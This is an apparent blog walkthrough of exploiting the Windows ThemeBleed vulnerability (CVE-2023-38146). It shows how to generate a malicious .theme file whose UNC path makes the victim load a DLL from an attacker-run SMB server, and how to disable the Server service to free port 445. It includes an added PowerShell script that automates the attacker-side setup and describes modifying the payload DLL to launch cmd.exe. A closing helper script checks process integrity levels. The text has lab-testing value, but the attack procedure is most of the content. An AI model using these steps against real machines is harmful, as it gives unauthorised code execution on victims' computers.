Let's try to exploit yet another Windows vulnerability, CVE-2023-38146, aka ThemeBleed. To do that we need to create a theme file that contains the path (a UNC path pointing at our SMB server) from which the payloads will be delivered. When the victim opens the theme, Windows follows that path and ends up loading a DLL from the share; the ThemeBleed server serves a clean file while Windows checks its signature and a different one when Windows actually loads it, which is why it needs to own the SMB port.
Please note that, as per my testing, the command execution only happens if both the SMB server and the theme file are on the same machine. Pulling DLL(s) from a remote system appears not to work.
On the attacker machine you will need to disable Windows' own SMB server by stopping and disabling the Server service (LanmanServer) in services.msc, otherwise it keeps TCP port 445 and the ThemeBleed server cannot bind to it. Keep that service in the disabled state while you test.
Download the repo and use the command below to generate the theme file:
.\ThemeBleed.exe make_theme localhost exp.theme
After generating the theme file, run ThemeBleed in server mode so it can answer the SMB requests for the payload.
Now let's copy exp.theme to the victim machine (Windows 11) and open it to trigger the exploit.
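The whole attacker-side procedure above (free port 445, build the theme, start serving), as an added PowerShell example that is not from the original post or the ThemeBleed repository. It assumes ThemeBleed.exe is in the current directory, that its server mode is started with a `server` subcommand (the post only says "server mode"; check the repo README if the name differs), and that the generated .theme file writes the server's UNC path under a `[VisualStyles]` `Path=` entry. Run it from an elevated prompt.

```powershell
# Added example: prepare the attacker host so ThemeBleed's built-in SMB server
# can own TCP 445, then build the theme and start serving. Needs admin rights.
$svc = 'LanmanServer'          # display name "Server": Windows' own SMB server
Stop-Service -Name $svc -Force # -Force also stops services that depend on it
Set-Service  -Name $svc -StartupType Disabled
if ((Get-Service -Name $svc).Status -ne 'Stopped') { throw "$svc is still running" }

# Nothing else may be listening on 445, or the exploit server cannot bind.
$busy = Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue
if ($busy) { throw "Port 445 still in use by PID $($busy.OwningProcess)" }

# Build the theme. The first argument is the host the victim's UNC path points at;
# the post uses localhost because the author only got it working locally.
$server = 'localhost'
& .\ThemeBleed.exe make_theme $server exp.theme
if (-not (Test-Path .\exp.theme)) { throw 'theme file was not created' }

# Sanity check: the .theme is INI text and should carry a UNC path (\\server\...)
# to our server. (Assumption: it lives under [VisualStyles] as "Path=".)
Select-String -Path .\exp.theme -Pattern '\\\\' | ForEach-Object Line

# Serve the payload. "server" is the subcommand name this example assumes for the
# post's "server mode".
& .\ThemeBleed.exe server
```

When you are done testing, `Set-Service -Name LanmanServer -StartupType Automatic` followed by `Start-Service LanmanServer` restores normal file sharing on the attacker machine.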
As we can see, calc.exe has been executed.
The Windows permission model is not something you can eyeball, so rather than guess what privileges calc.exe ended up with, let's check the process token. From Process Explorer we can see the following information.
As this is no fun, we will try to execute our own command, cmd.exe, by modifying the DLL that the exploit delivers.
Now I have created my own DLL and, instead of running calc.exe, I tried to run cmd.exe. After a couple of tries I was able to run calc.exe and a message box showing a prompt. In the screenshot below you will also be able to see the permission level the cmd.exe process is running at.
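Both "permission level" checks above (the Process Explorer look at calc.exe and the screenshot of cmd.exe) can be reproduced from the command line. The following is an added PowerShell example, not code from the post or the ThemeBleed repo: it reports the owner and mandatory integrity level of every process with a given name, which tells you whether the payload inherited the victim user's medium-integrity token or something higher. The process names passed at the bottom are assumptions; on Windows 11 calc.exe hands off to a separate Calculator process, so query that name if calc itself has already exited.

```powershell
# Added example: owner + integrity level of a process, via TokenIntegrityLevel.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class TokenInfo {
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool GetTokenInformation(IntPtr tok, int cls, IntPtr info, int len, out int ret);
    [DllImport("advapi32.dll")] static extern IntPtr GetSidSubAuthority(IntPtr sid, uint idx);
    [DllImport("advapi32.dll")] static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
    [DllImport("kernel32.dll")] static extern bool CloseHandle(IntPtr h);
    const uint TOKEN_QUERY = 0x0008;
    const int TokenIntegrityLevel = 25;   // TOKEN_INFORMATION_CLASS value
    // Returns the last sub-authority (RID) of the token's mandatory label SID.
    public static uint GetIntegrityRid(IntPtr hProcess) {
        IntPtr tok;
        if (!OpenProcessToken(hProcess, TOKEN_QUERY, out tok))
            throw new Exception("OpenProcessToken failed: " + Marshal.GetLastWin32Error());
        try {
            int len;
            GetTokenInformation(tok, TokenIntegrityLevel, IntPtr.Zero, 0, out len); // size probe
            IntPtr buf = Marshal.AllocHGlobal(len);
            try {
                if (!GetTokenInformation(tok, TokenIntegrityLevel, buf, len, out len))
                    throw new Exception("GetTokenInformation failed: " + Marshal.GetLastWin32Error());
                IntPtr sid = Marshal.ReadIntPtr(buf);          // TOKEN_MANDATORY_LABEL.Label.Sid
                byte count = Marshal.ReadByte(GetSidSubAuthorityCount(sid));
                return (uint)Marshal.ReadInt32(GetSidSubAuthority(sid, (uint)(count - 1)));
            } finally { Marshal.FreeHGlobal(buf); }
        } finally { CloseHandle(tok); }
    }
}
"@

function Get-ProcessIntegrity {
    param([Parameter(Mandatory)][string]$Name)
    # SECURITY_MANDATORY_*_RID values
    $levels = @{ 0x0000='Untrusted'; 0x1000='Low'; 0x2000='Medium'; 0x2100='Medium+'; 0x3000='High'; 0x4000='System' }
    foreach ($p in Get-Process -Name $Name -ErrorAction Stop) {
        # .Handle opens the process; that fails for processes we may not query
        # (e.g. an elevated one from a non-elevated shell), which is itself a hint.
        try { $rid = [TokenInfo]::GetIntegrityRid($p.Handle) } catch { $rid = $null }
        $owner = Invoke-CimMethod -MethodName GetOwner `
                   -InputObject (Get-CimInstance Win32_Process -Filter "ProcessId=$($p.Id)")
        [pscustomobject]@{
            Name      = $p.Name
            PID       = $p.Id
            User      = "$($owner.Domain)\$($owner.User)"
            Integrity = if ($null -ne $rid) { $levels[[int]$rid] } else { 'query failed (elevated?)' }
        }
    }
}

Get-ProcessIntegrity -Name cmd     # the payload's cmd.exe (assumed name)
Get-ProcessIntegrity -Name calc    # or CalculatorApp on Windows 11
```

A payload spawned by the theme handler normally shows up as the logged-on user at Medium integrity; if you see High or System, the loading process ran elevated, which changes what the exploit is worth.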
Currently I was not able to deliver the payload from a remote system, and I am planning to check why my DLL works when run from localhost but not from a remote system. The author's original DLL, however, works both on localhost and from remote systems.